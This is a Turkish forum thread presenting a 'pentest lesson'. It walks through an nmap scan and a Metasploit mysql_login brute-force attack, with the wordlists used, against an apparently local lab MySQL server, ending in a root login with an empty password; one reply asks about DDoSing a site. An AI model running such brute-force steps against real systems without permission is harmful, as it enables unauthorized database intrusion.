1. Ayyıldız Tim forumu Hariç Hiç Bir şekilde Rütbeli Oldugunu İddaa edenlere inanmayınız..⠀ Ayyıldız Tim Adına Sizden Bilgi Belge TC Kimlik Vb Evrak İsteyenlere Asla Bilgilerinizi Vermeyiniz.

Pentest Dersi Mysql Hackleme Metasploit

'Exploitler' forumunda ArslannBey tarafından 12 Temmuz 2017 tarihinde açılan konu

  1. ArslannBey Guest

    • Guest
    Katılım:
    16 Ocak 2017
    Mesaj:
    1,218
    Alınan Beğeniler:
    2,394

    Özel Mesaj
    Pentest derslerine yavaş yavaş başlıyoruz.

    saldıracağımız ip adresimiz : 192.168.222.131

    bu ip adresin mysql' una ulaşmaya çalışacağız.bunu yaparken kullanacağımız materyaller :

    1-Nmap

    2-Metasploit

    3-User list

    4-Pass list


    Tahmin edebileceğiniz üzere Hedef sistemin mysql'una brute force saldırısı düzenleyeceğim.

    Nmap Aracılığla Açıklı port versionlarını görüntülüyorum.

    -sS komutu ile Syn taraması yaparak tcp portlarını görüntüledim ve de -sV komutu ile remote servislerin versionlarını görüntüledim.Bizim burada bakacağımız şey mysql portu 3306 dır.

    [​IMG]

    Evet görüldüğü üzere Sistem Mysql Versiyonu olarak MySQL 5.0.51a-3ubuntu5 i kullanıyor.


    Şimdi Metasploitimizi açalım ve uygun auxiliary'yi arayalım

    Kod:
    service postgresql start
    Kod:
    service mysql start
    Kod:
    msfconsole
    Evet giriş yaptık.

    şimdi komutumuz ise auxiliary aramak olucak.
    Kod:
    search mysql_login 
    yazalım.

    Kod:
    use auxiliary/scanner/mysql/mysql_login 
    ile auxiliary'ye giriş yapalım.Giriş Yaptık Ardından show options komutu ile bizden bazı seyleri doldurmamızı istediğini görüyoruz.

    [​IMG]

    Bizde Dolduralım o zaman.

    Kod:
    set RHOSTS 192.168.222.131
    diyoruz ve enterlıyoruz. Hedef sistemi girdik.Ardından ben bir userlist ve passlist oluşturuyorum

    userlistimiz:
    Kod:
    msfadmin
    msf
    root

    passlistimiz:
    Kod:
    (boşluk-hiçbirşey)
    root
    msfadmin
    pass
    password
    [​IMG]


    Ve Ardından run diyoruz. brute force atağımız başlıyor.

    [​IMG]


    Evet brute force atağımız başarılı .

    Kullanıcı adı : root

    şifre : yok (hiçbirşey)



    Kontrol edelim.Terminali açalım ve şunu yazalım.


    Kod:
    mysql -h 192.168.222.131 -u root -p (hiçbirşey yazılmıycak çünkü yok)
    Ardından tekrar password soruyor gene enterlıyoruz birşey yazmadan ve Hedef sistemin mysql'una giriş yaptık.

    [​IMG]

    Konuyu anlatmamdaki amaç Mysql 3306 portunun metasploit ile nasıl hacklenebilineceği idi.İlgi alakaya göre daha çok konu acabilirim.
     
  2. whohack Guest

    • Guest
    Katılım:
    11 Temmuz 2017
    Mesaj:
    6
    Alınan Beğeniler:
    0

    Özel Mesaj
    siteye ddos atsam bing bassam olmaz mı
     
  3. ArslannBey Guest

    • Guest
    Katılım:
    16 Ocak 2017
    Mesaj:
    1,218
    Alınan Beğeniler:
    2,394

    Özel Mesaj
    derken
     
    Orion-Pax bunu beğendi.
  4. ERVAH-I-EZEL Guest

    • Guest
    Katılım:
    30 Ocak 2017
    Mesaj:
    1,333
    Alınan Beğeniler:
    4,931

    Özel Mesaj
    Bize böyle konular gerekli. Ellerine sağlık. :)
     
  5. ArslannBey Guest

    • Guest
    Katılım:
    16 Ocak 2017
    Mesaj:
    1,218
    Alınan Beğeniler:
    2,394

    Özel Mesaj
    sağolasın dediğim gibi ilgi alakaya göre yeni konular acabilirim
     
    Orion-Pax ve ERVAH-I-EZEL bunu beğendi.
  6. akose Atıldı

    • Guest
    Katılım:
    14 Ocak 2017
    Mesaj:
    1,775
    Alınan Beğeniler:
    2,692

    Özel Mesaj
    Eline sağlık senden her zaman böyle konular beklerdim ve bekliyorumda :)
     
    Fatih1558, ERVAH-I-EZEL ve ArslannBey bunu beğendi.
    • Guest
    Katılım:
    11 Kasım 2016
    Mesaj:
    156
    Alınan Beğeniler:
    151

    Özel Mesaj
    Eline sağlık devrem çok güzel konu...
     
    ERVAH-I-EZEL ve ArslannBey bunu beğendi.
  7. ArslannBey Guest

    • Guest
    Katılım:
    16 Ocak 2017
    Mesaj:
    1,218
    Alınan Beğeniler:
    2,394

    Özel Mesaj
    sağolasınız devamı gelcek inşallah
     
    Orion-Pax, akose ve ERVAH-I-EZEL bunu beğendi.
  8. ArslannBey Guest

    • Guest
    Katılım:
    16 Ocak 2017
    Mesaj:
    1,218
    Alınan Beğeniler:
    2,394

    Özel Mesaj
  9. Zekrid Guest

    • Guest
    Katılım:
    6 Haziran 2017
    Mesaj:
    53
    Alınan Beğeniler:
    136

    Özel Mesaj
    eline sağlık devrem. güzel anlatım olmuş. konularını çok yararlı buluyorum. inşallah kısa sürede yükselirsin.
     
    ArslannBey bunu beğendi.
  10. ArslannBey Guest

    • Guest
    Katılım:
    16 Ocak 2017
    Mesaj:
    1,218
    Alınan Beğeniler:
    2,394

    Özel Mesaj
    Sağolasın
     
    Orion-Pax bunu beğendi.

Bu Sayfayı Paylaş